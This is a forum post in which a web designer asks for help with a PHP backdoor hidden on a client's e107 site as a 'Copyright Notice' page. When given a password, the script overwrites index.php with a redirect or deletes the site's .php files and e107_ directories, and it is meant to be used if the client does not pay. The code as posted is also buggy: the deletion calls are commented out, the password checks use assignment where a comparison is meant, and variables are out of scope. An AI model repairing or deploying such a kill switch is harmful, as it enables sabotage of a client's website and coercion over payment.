I have been doing some web design for a few people who are less than trust worthy. One in perticular is running an e107 portal and I wanted to make a script that if he doesn't pay up I can enter a password into a page and it will edit, or if it doesnt exist create, the index.php file. If I put in another password it will delete all of the directorys starting with the prefix "e107_" and all of the files ending in ".php". Here is the script can anyone tell me what is wrong with it and or a way to simplify it?
<?php
// Variables
$location = "http://xxx/zg2/index.php";
$location2 = "http://xxx/e107_docs/news.php";
$header = "header(\"Location: " . $location2 . "\");";
switch ($HTTP_GET_VARS['act']) {
//Home
default:
home();
break;
//2
case '2':
step2();
break;
};
function home() {
echo "
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\">
<html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">
<title>Copyright Notice</title>
</head>
<form action=\"copyright.php?act=2\" method=\"post\">
<input type=\"text\" id=\"text\" name=\"text\">
<input type=\"submit\" value=\"submit\">
</form>
<body>
</body>
</html>
";
};
function step2() {
$text = $_GET['text'];
if ($text="xxx") {
$file = file("$location");
$handle = fopen("$file", "w");
fwrite($file, $header);
fclose("$file");
} elseif ($text="xxx") {
foreach (glob("*.php") as $filename) {
echo "$filename size " . filesize($filename) . " <div style=\"color:0000FF\">Deleted</div>\n";
//unlink("$filename");
}
foreach (glob("e107_*") as $dirname) {
echo "$dirname <div style=\"color:0000FF\">Deleted</div>\n";
//rmdir("$dirname");
}
} else {
echo "Sorry none of your passwords matched.";
};
};
?>
Thank you.
